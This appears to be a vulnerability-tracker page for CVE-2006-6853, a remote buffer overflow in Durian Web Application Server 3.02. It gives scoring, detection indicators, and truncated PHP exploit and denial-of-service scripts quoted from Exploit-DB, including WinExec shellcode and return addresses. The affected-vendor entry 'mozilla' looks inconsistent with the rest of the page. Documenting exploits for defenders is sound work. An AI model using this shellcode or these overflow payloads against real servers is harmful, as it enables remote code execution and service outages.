CVE-2006-6853
published 2006-12-31CVE-2006-6853: Buffer overflow in Durian Web Application Server 3.02 freeware on Windows allows remote attackers to execute arbitrary code via a long string in a crafted…
PriorityP353critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
8.01%
94.0th percentile
Buffer overflow in Durian Web Application Server 3.02 freeware on Windows allows remote attackers to execute arbitrary code via a long string in a crafted packet to TCP port 4002.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilla | durian_web_application_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x59\x53\xbb\x6d\x13\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xda\xcd\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20
- →Monitor for large crafted TCP packets sent to port 4002 targeting Durian Web Application Server 3.02; the exploit cycles through buffer sizes of 30, 70, 150, 330, 520, 700, 1400, and 2300 bytes using repeated byte patterns (0xaa, 0xa0, 0x41). ↗
- →Detect shellcode containing WinExec (0x7c86136d) and ExitProcess (0x7c81cdda) addresses in TCP port 4002 payloads, indicative of exploitation of CVE-2006-6853 on Windows XP/2003 targets. ↗
- →The DoS variant also targets TCP port 4002 with the same byte patterns and size array; repeated connections with oversized payloads to this port from a single source should be alerted on. ↗
- ·The RCE exploit uses two different EIP values depending on whether DEP is enabled or disabled on the target; defenders should note both return addresses when writing signatures. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Durian Web Application Server 3.02 - Remote Buffer Overflow
exploitdb·2006-12-29
CVE-2006-6853 Durian Web Application Server 3.02 - Remote Buffer Overflow
Durian Web Application Server 3.02 - Remote Buffer Overflow
---
http://sourceforge.net/projects/durian/
*/
error_reporting(E_ALL);
$address = "192.168.1.3";
$service_port = "4002";
$shellcode =
"\xeb\x1b".
"\x5b".
"\x31\xc0".
"\x50".
"\x31\xc0".
"\x88\x43\x59".
"\x53".
"\xbb\x6d\x13\x86\x7c". //WinExec, 0x7c86136d
"\xff\xd3".
"\x31\xc0".
"\x50".
"\xbb\xda\xcd\x81\x7c". //ExitProcess, 0x7c81cdda
"\xff\xd3".
"\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64".
"\x2e".
"\x65".
"\x78\x65".
"\x20\x2f".
"\x63\x20".
"cmd.exe /c start notepad & ";
//$eip="\x72\xe0\xf1\x00";//DEP disabled
$eip="\x72\xe0\xf2\x00";
$ch =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);
for ($j=0; $j
# milw0rm.com [2006-12-29]
Exploit-DB
Durian Web Application Server 3.02 - Denial of Service
exploitdb·2006-12-29
CVE-2006-6853 Durian Web Application Server 3.02 - Denial of Service
Durian Web Application Server 3.02 - Denial of Service
---
http://sourceforge.net/projects/durian/
//by rgod mail: retrog at alice dot it site: http://retrogod.altervista.org
error_reporting(E_ALL);
$service_port = "4002";
$address = "192.168.1.3";
$ch =array("\xaa","\xa0","\x41");
$size=array(30,70,150,330,520,700,1400,2300);
$c=1000;
for ($m=1; $m
# milw0rm.com [2006-12-29]
No writeups or analysis indexed.
http://securitytracker.com/id?1017456http://www.securityfocus.com/bid/21808https://exchange.xforce.ibmcloud.com/vulnerabilities/31161https://www.exploit-db.com/exploits/3037https://www.exploit-db.com/exploits/3038http://securitytracker.com/id?1017456http://www.securityfocus.com/bid/21808https://exchange.xforce.ibmcloud.com/vulnerabilities/31161https://www.exploit-db.com/exploits/3037https://www.exploit-db.com/exploits/3038
2006-12-31
Published